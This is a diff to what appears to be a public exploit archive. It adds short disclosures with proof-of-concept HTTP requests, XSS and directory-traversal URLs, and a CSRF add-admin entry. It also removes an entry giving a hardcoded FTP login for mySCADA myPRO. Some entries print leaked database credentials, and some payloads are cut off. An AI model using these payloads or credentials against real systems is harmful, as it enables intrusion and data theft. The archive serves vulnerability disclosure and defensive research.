diff --git a/exploits/hardware/webapps/45021.txt b/exploits/hardware/webapps/45021.txt
new file mode 100644
index 000000000..59a3dc5b9
--- /dev/null
+++ b/exploits/hardware/webapps/45021.txt
@@ -0,0 +1,40 @@
+# Exploit Title: Cela Link CLR-M20 2.7.1.6 - Arbitrary File Upload
+# Date: 2018-07-13
+# Shodan Dork: CLR-M20
+# Exploit Author: Safak Aslan
+# Software Link: http://www.celalink.com
+# Version: 2.7.1.6
+# Authentication Required: No
+# Tested on: Windows
+
+# Vulnerability Description
+# Due to the Via WebDAV (Web Distributed Authoring and Versioning),
+# on the remote server, Cela Link CLR-M20 allows unauthorized users to upload
+# any file(e.g. asp, aspx, cfm, html, jhtml, jsp, shtml) which causes
+# remote code execution as well.
+# Due to the WebDAV, it is possible to upload the arbitrary
+# file utilizing the PUT method.
+
+# Proof-of-Concept
+# Request
+
+PUT /test.html HTTP/1.1
+Host: targetIP
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0)
+Gecko/20100101 Firefox/61.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en,tr-TR;q=0.8,tr;q=0.5,en-US;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Length: 26
+
+the reflection of random numbers 1230123012
+
+# Response
+
+HTTP/1.1 201 Created
+Content-Length: 0
+Date: Fri, 13 Jul 2018 14:38:54 GMT
+Server: lighttpd/1.4.20
+
+As a result, on the targetIP/test.html, "the reflection of random numbers
+1230123012" is reflected on the page.
\ No newline at end of file
diff --git a/exploits/java/webapps/45153.txt b/exploits/java/webapps/45153.txt
new file mode 100644
index 000000000..2048110cd
--- /dev/null
+++ b/exploits/java/webapps/45153.txt
@@ -0,0 +1,32 @@
+# Exploit Title: LAMS < 3.1 - Cross-Site Scripting
+# Date: 2018-08-05
+# Exploit Author: Nikola Kojic
+# Website: https://ras-it.rs/
+# Vendor Homepage: https://www.lamsfoundation.org/
+# Software Link: https://www.lamsfoundation.org/downloads_home.htm
+# Category: Web Application
+# Platform: Java
+# Version: <= 3.1
+# CVE: 2018-12090
+
+# Vendor Description:
+# LAMS is a revolutionary new tool for designing, managing and delivering online collaborative
+# learning activities. It provides teachers with a highly intuitive visual authoring
+# environment for creating sequences of learning activities.
+
+# Technical Details and Exploitation:
+# There is unauthenticated reflected cross-site scripting (XSS) in LAMS before 3.1 that allows
+# a remote attacker to introduce arbitrary JavaScript via manipulation of an unsanitized GET
+# parameter during a forgotPasswordChange.jsp?key= password change.
+
+# Proof of Concept:
+http://localhost:8080/lams/forgotPasswordChange.jsp?key=%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E
+
+# Timeline:
+# 2018-06-07: Discovered
+# 2018-06-08: Vendor notified
+# 2018-06-08: Vendor replies
+# 2018-06-11: CVE number requested
+# 2018-06-11: CVE number assigned
+# 2018-06-15: Patch released
+# 2018-08-05: Public disclosure
\ No newline at end of file
diff --git a/exploits/multiple/remote/44656.txt b/exploits/multiple/remote/44656.txt
deleted file mode 100644
index 60b756957..000000000
--- a/exploits/multiple/remote/44656.txt
+++ /dev/null
@@ -1,27 +0,0 @@
-#Exploit Title: mySCADA myPRO 7 - Hardcoded FTP Username and Password
-#Date: 2018-05-19
-#Exploit Author: Emre ÖVÜNÇ
-#Vendor Homepage: https://www.myscada.org/mypro/
-#Software Link: https://www.myscada.org/download/
-#Version: v7
-#Tested on: Linux, Windows
-
-# I. Problem Description
-
-#In the latest version of myPRO (v7), it has been discovered that the ftp server's -running on port 2121- username and password information is kept in the file by using reverse engineering. Anyone who connects to an FTP server with an authorized account can upload or download files onto the server running myPRO software.
-
-# II. Technical
-
-Hardcoded username:password = myscada:Vikuk63
-
-#Firstly, I found that what ports myPRO listened to. You can get information used by the netstat command about the ports and the services running on it. When you install myPRO, you can see many ports open. The vulnerability works on all supported platforms.
-
-#In my first research on the Windows OS, myPRO has many process and I noticed that ‘myscadagate.exe’ is listening to port #2121.
-
-#I found that they put the username and password (myscada:Vikuk63) in the source code. I obtained access by connecting to port 2121 of myPRO's server with any FTP client.
-
-#(Details: https://emreovunc.com/blog/en/mySCADA-myPRO7-Exploit.pdf)
-
-# III. Solution
-
-#As a workaround you need to restrict port 2121 access from the outside. There is no permanent solution for the vendor because there is no patch available.
\ No newline at end of file
diff --git a/exploits/php/webapps/45150.txt b/exploits/php/webapps/45150.txt
new file mode 100644
index 000000000..cd49f5598
--- /dev/null
+++ b/exploits/php/webapps/45150.txt
@@ -0,0 +1,18 @@
+# Exploit Title: [Subrion CMS- 4.2.1 XSS (Using component with known
+Vulnerability)]
+# Date: [02-08-2018]
+# Exploit Author: [Zeel Chavda]
+# Vendor Homepage: [https://subrion.org/]
+# Software Link: [https://subrion.org/download/]
+# Version: [4.2.1] (REQUIRED)
+# Tested on: [Windows,FireFox]
+# CVE : [CVE-2018-14840]
+
+Steps: -
+
+1. Create a file with XSS payload.
+2. Save it with .html extension.
+3. Upload via CKEditor manager and execute "file.html".
+
+Reference: -
+https://github.com/intelliants/subrion/commit/cb10ac2294cb2c3a6d2159f9a2bb8c58a2a10a47
\ No newline at end of file
diff --git a/exploits/php/webapps/45154.html b/exploits/php/webapps/45154.html
new file mode 100644
index 000000000..244a61a36
--- /dev/null
+++ b/exploits/php/webapps/45154.html
@@ -0,0 +1,25 @@
+ # Exploit Title: Cross-Site Request Forgery (Add Admin)
+ # Google Dork: Powered by onArcade v2.4.2
+ # Date: 2018/August/4
+ # Author: r3m0t3nu11[Zero-way]
+ # Software Link: ["http://www.onarcade.com"]
+ # Version: ["Uptodate"]
+
+the appilication is vulnerable to CSRF attack (No CSRF token in place) meaning that if an admin user can be tricked to visit a crafted URL created by attacker (via spear phishing/social engineering).
+
+
+
+[P0C]#
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/exploits/php/webapps/45155.txt b/exploits/php/webapps/45155.txt
new file mode 100644
index 000000000..4ad725383
--- /dev/null
+++ b/exploits/php/webapps/45155.txt
@@ -0,0 +1,26 @@
+# Exploit Title: CMS ISWEB 3.5.3 - Directory Traversal
+# Date: 2018-08-01
+# Exploit Author: Thiago "thxsena" Sena
+# Vendor Homepage: http://www.isweb.it
+# Version: 3.5.3
+# Tested on: Linux
+# CVE : N/A
+
+# PoC:
+# CMS ISWEB 3.5.3 is vulnerable to directory traversal and local file download,
+# as demonstrated by
+
+moduli/downloadFile.php?file=oggetto_documenti/../.././inc/config.php
+
+# Download and open it.
+$dati_db = array(
+ 'tipo' => 'mysql',
+ 'host' => 'localhost',
+ 'user' => 'networkis',
+ 'password' => 'guybrush77',
+ 'database' => 'networkis',
+ 'database_offline' => '',
+ 'persistenza' => FALSE,
+ 'prefisso' => '',
+ 'like' => 'LIKE'
+);
\ No newline at end of file
diff --git a/exploits/php/webapps/45156.txt b/exploits/php/webapps/45156.txt
new file mode 100644
index 000000000..0dd61729b
--- /dev/null
+++ b/exploits/php/webapps/45156.txt
@@ -0,0 +1,19 @@
+# Exploit Title:Monstra-Dev 3.0.4 Stored Cross Site Scripting
+# Date: 04-08-2018
+# Exploit Author: Nainsi Gupta
+# Vendor Homepage: http://monstra.org/
+# Software Link: https://github.com/monstra-cms/monstra
+#Published In- https://indiancybersecuritysolutions.com/cve-2018-14922-cross-site-scripting/
+# Product Name: Monstra-dev
+# Version: 3.0.4
+# Tested on: Windows 10 (Firefox/Chrome)
+# CVE : CVE-2018-14922
+
+
+#POC
+1. 1. Go to the site ( http://server.com/monstra-dev/ ) .
+2- Click on Registration page (Registration) .
+3- Register by giving you name ,mail and soo on...
+4 -Now log In i the website.
+5.After loggin in click on edit profile and in the frist name and last name copy paste this payload- in firsname paste ">